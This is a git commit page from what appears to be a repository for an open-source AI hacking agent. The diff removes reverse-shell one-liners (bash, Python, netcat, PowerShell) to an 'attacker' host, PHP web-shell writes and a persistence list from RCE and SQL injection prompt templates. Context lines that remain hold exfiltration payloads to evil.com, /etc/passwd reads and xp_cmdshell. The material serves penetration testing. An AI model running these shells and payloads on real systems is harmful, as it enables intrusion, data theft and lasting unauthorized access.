salvacybersec/strix
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Remove rce prompt examples

Browse Source
This commit is contained in:
Ahmed Allam
2025-09-12 11:52:35 -07:00
parent 9a9a7268cd
commit 5294d613d0
3 changed files with 3 additions and 20 deletions
Download Patch File Download Diff File Expand all files Collapse all files

2
pyproject.toml
View File

@@ -1,6 +1,6 @@
[tool.poetry] [tool.poetry]
name = "strix-agent" name = "strix-agent"
version = "0.1.14" version = "0.1.15"
description = "Open-source AI Hackers for your apps" description = "Open-source AI Hackers for your apps"
authors = ["Strix <hi@usestrix.com>"] authors = ["Strix <hi@usestrix.com>"]
readme = "README.md" readme = "README.md"

20
strix/prompts/vulnerabilities/rce.jinja
View File

@@ -59,7 +59,7 @@ ${IFS}id
<language_specific_rce> <language_specific_rce>
<php> <php>
- eval($_GET['cmd']) - eval() with user input
- system(), exec(), shell_exec(), passthru() - system(), exec(), shell_exec(), passthru()
- preg_replace with /e modifier - preg_replace with /e modifier
- assert() with string input - assert() with string input
@@ -101,7 +101,7 @@ Works in multiple contexts:
- DNS exfiltration: $(whoami).evil.com - DNS exfiltration: $(whoami).evil.com
- HTTP callbacks: curl evil.com/$(id) - HTTP callbacks: curl evil.com/$(id)
- Time delays for boolean extraction - Time delays for boolean extraction
- Write to web root: echo '<?php system($_GET["cmd"]); ?>' > /var/www/shell.php - Write to web root
</blind_rce> </blind_rce>
<chained_exploitation> <chained_exploitation>
@@ -163,22 +163,6 @@ concat:|file:///etc/passwd
- Path traversal: /usr/bin/id vs id - Path traversal: /usr/bin/id vs id
</waf_bypasses> </waf_bypasses>
<post_exploitation>
<reverse_shells>
Bash: bash -i >& /dev/tcp/attacker/4444 0>&1
Python: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
Netcat: nc -e /bin/sh attacker 4444
PowerShell: $client = New-Object System.Net.Sockets.TCPClient("attacker",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
</reverse_shells>
<persistence>
- Cron jobs
- SSH keys
- Web shells
- Systemd services
</persistence>
</post_exploitation>
<validation> <validation>
To confirm RCE: To confirm RCE:
1. Execute unique command (id, hostname) 1. Execute unique command (id, hostname)

1
strix/prompts/vulnerabilities/sql_injection.jinja
View File

@@ -82,7 +82,6 @@ PostgreSQL:
<file_operations> <file_operations>
MySQL: MySQL:
' UNION SELECT 1,2,LOAD_FILE('/etc/passwd')-- ' UNION SELECT 1,2,LOAD_FILE('/etc/passwd')--
' UNION SELECT 1,2,'<?php system($_GET[cmd]); ?>' INTO OUTFILE '/var/www/shell.php'--
MSSQL: MSSQL:
'; EXEC xp_cmdshell 'type C:\Windows\win.ini'-- '; EXEC xp_cmdshell 'type C:\Windows\win.ini'--